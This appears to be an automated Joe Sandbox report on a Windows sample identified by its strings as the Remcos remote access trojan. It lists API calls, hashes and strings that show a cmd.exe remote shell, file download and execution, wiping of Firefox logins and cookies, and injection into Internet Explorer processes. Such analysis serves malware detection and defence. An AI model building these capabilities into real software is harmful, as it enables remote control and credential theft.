                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Startup
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 724789610-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                                                                                                                                                                                                              • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: send
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Deallocate
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1075933841-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007E20: FindFirstFileW.KERNEL32(?,?,?,00000000,76230F00), ref: 10007ED1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10007E20: FindNextFileW.KERNELBASE(00000000,?,?,00000000,76230F00), ref: 10007F0A
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 10007E03
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileFind$FirstNextSleep
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2635277345-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 78a5c36d1815e0a846b997e217213f90180f57ee50d307f22e4cc0e7a3be6cb2
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ba8769b27b28ad511b2499f2b98cea4f31d6ecccccff2d72c20009a19a29048a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78a5c36d1815e0a846b997e217213f90180f57ee50d307f22e4cc0e7a3be6cb2
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AE08636F0125467A601D6AEDC8195BF3EDEB891A0B1100B6E90DD3301E871DD0142E1
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
• Instruction ID: 38694f91ddd66904e98ee13f1febf2482794bae3131ffd3a876a6d6af10a8f86
• Opcode Fuzzy Hash: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
• Instruction Fuzzy Hash: 29B00832418382EFCF02DF90DD0492ABAA2BB88712F084C6CB2A14017187228428EB16
APIs
• SetEvent.KERNEL32(?), ref: 00406F28
• GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
• DeleteFileW.KERNEL32(00000000), ref: 00407018
  • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
  • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
  • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
  • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
  • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
  • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
  • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
  • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
  • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
  • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(0000028C,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
  • Part of subcall function 00404468: SetEvent.KERNEL32(0000028C,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
• SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
• DeleteFileA.KERNEL32(?), ref: 004078CC
  • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
  • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
  • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
• Sleep.KERNEL32(000007D0), ref: 00407976
• StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
  • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Yara matches
Similarity
• API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
• String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$TTF$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
• API String ID: 2918587301-184849705
• Opcode ID: 0f7f8846a261c8fbb0c5761866e5f27c5a44f4c26e703f5a6ba352629164d15a
• Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
• Opcode Fuzzy Hash: 0f7f8846a261c8fbb0c5761866e5f27c5a44f4c26e703f5a6ba352629164d15a
• Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
APIs
• __Init_thread_footer.LIBCMT ref: 0040508E
  • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
  • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
  • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
• __Init_thread_footer.LIBCMT ref: 004050CB
• CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
• CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
  • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
  • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
• Sleep.KERNEL32(0000012C,00000093), ref: 0040523F
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
  • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
• WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
• Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
• TerminateProcess.KERNEL32(00000000), ref: 004053C1
• CloseHandle.KERNEL32 ref: 004053CD
• CloseHandle.KERNEL32 ref: 004053D5
• CloseHandle.KERNEL32 ref: 004053E7
• CloseHandle.KERNEL32 ref: 004053EF
Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                                                                                                                                                                              • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                                                                                                                                                                                                                                                                                                              • API String ID: 3815868655-1274243119
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                                                                                                                                                                                                                              • String ID: 0DG$Remcos restarted by watchdog!$TTF$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 65172268-329858390
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                                                                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                                                                                                                                                                              • API String ID: 1164774033-3681987949
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Find$Close$File$FirstNext
                                                                                                                                                                                                                                                                                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                                                                                                                                              • API String ID: 3527384056-432212279
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3ee8648b0f7b479d09f0d72853fb9419505b6b58160fc926f9c5edfb858060ca
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ee8648b0f7b479d09f0d72853fb9419505b6b58160fc926f9c5edfb858060ca
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000440,00000000,00000000), ref: 10007054
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: OpenProcess
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3743895883-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5123f2d251da449f23a0145715559065d7c177eff71aa2cd70a97f408bb63da0
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3fc6cb16c2acb38648db70abfd8e28bf1beac7dae34e75593325fef57f3a6704
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5123f2d251da449f23a0145715559065d7c177eff71aa2cd70a97f408bb63da0
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3717FB1E00219BBFB10DBA4DC85FEE77B8EF04794F1041A5FA08E6195E7759A01CBA1
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                                                                                                                                                                                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 726551946-3025026198
                                                                                                                                                                                                                                                                                                                              • Opcode ID: db55228f945c143f8b4a38cf357b23bed3cff89228339865896ae8425b8d91ca
